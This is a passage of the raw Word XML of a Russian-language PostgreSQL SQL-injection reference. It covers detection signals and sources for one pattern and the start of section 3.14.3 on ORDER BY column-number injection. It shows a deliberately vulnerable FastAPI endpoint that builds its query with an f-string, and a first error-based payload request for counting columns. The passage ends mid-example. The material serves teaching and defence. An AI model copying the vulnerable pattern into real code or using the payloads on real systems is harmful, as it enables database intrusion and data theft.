        <w:t>Database-logs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ошибки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>column "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от попыток инъекции имени несуществующей колонки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F20664" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-логи</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 422 / 500 errors с unusual </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter, особенно с non-ASCII characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EC128E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Все версии PG</w:t>
      </w:r>
      <w:r>
        <w:t>; bind-protocol для identifier не работает с 7.4 (когда extended protocol появился). Никакие фиксы не закрывают этот класс — это application-level mis-configuration + протокольное ограничение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19909E77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1BFCA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 Stacked queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant A зависит от driver-mode; см. таблицу 3.5.6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B80F5F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 UNION-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — канал извлечения для Variant B при выровненном select-list count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083289A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Error-based via CAST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant B также может попасть в error-канал через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: ORDER BY position N is not in select list</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D792DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.3 ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — integer-column-reference, тот же ORDER BY-clause, но другой контекст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A297E1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 Identifier injection в plpgsql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — тот же класс уязвимостей на серверной стороне (внутри plpgsql functions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D77B2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 Дополнительные приёмы валидации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — whitelist-шаблоны для ORDER BY.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099D04A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C84106" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «SELECT» / «ORDER BY Clause» — https://www.postgresql.org/docs/current/sql-select.html#SQL-ORDERBY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08737287" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   PostgreSQL Docs: «System Information Functions» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/functions-info.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFD555F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   OWASP: «SQL Injection Prevention Cheat Sheet» (раздел Defense Option 3: Allow-list Input Validation) — https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-3-allow-list-input-validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C0FD6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Unicode TR #36 «Unicode Security Considerations» (homoglyph attacks) — https://www.unicode.org/reports/tr36/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC6DEE4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   SQLAlchemy Docs: «Using SQL Functions and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quoted_name</w:t>
      </w:r>
      <w:r>
        <w:t>» — https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.elements.quoted_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A61B5AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Wire Protocol: «Message Formats» (Bind / Parse) — https://www.postgresql.org/docs/current/protocol-message-formats.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1183C0C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.14.3 ORDER BY column_number (integer в select-list reference)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06879A24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Альтернативный синтаксис sort-by-column в PostgreSQL — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY N</w:t>
      </w:r>
      <w:r>
        <w:t>, где N — номер колонки из select-list (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сортирует по первой колонке). Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>integer-context</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но не интерпретируемое значение — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>позиционная ссылка на select-list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Кажется безопаснее, чем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (число — это число), и некоторые SQL-builder-ы используют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY {n}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как «защищённый» вариант. На деле — два класса проблем: (1) integer-context всё равно позволяет stacked queries в simple-protocol через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1; ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; (2) error-канал через невалидный column number — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY 99</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: ORDER BY position 99 is not in select list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с числом, что позволяет атакующему вычислить точное количество колонок в select-list — критичный шаг для UNION-extraction (3.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B31169F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453D8670" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/admin_logs.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645B44C3"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1C69D105" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2284810A"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0571667"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380348FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71139DAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1894BD2F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2A648E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/admin/audit-logs")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E606310" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_audit_logs(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C567F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort_col: str = Query("1"),   # ← string, не int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A31E151" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    direction: str = Query("DESC"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669DCCEB"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4ECB542C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6968FF0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if direction not in ("ASC", "DESC"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D016A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        direction = "DESC"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC3719" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDA69A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Антипаттерн: ORDER BY column_number через f-string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05145F5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799AA2FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, user_id, action, target, occurred_at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6B8C97" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM audit_log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FD5E31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE occurred_at &gt; now() - interval '30 days'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07132F68" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY {sort_col} {direction}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060E65B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7160515A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171DD4EC"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6E7E1283"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5990EF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Разработчик заменил «опасный» </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY column_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, считая что число защищает от injection. Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort_col</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>, и f-string подставляет его как текст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDF2E5D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — три варианта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C024E2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант A — error-based для определения select-list count (любой драйвер):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7DC427" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /admin/audit-logs?sort_col=99&amp;direction=ASC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DAE1AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360FF3E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
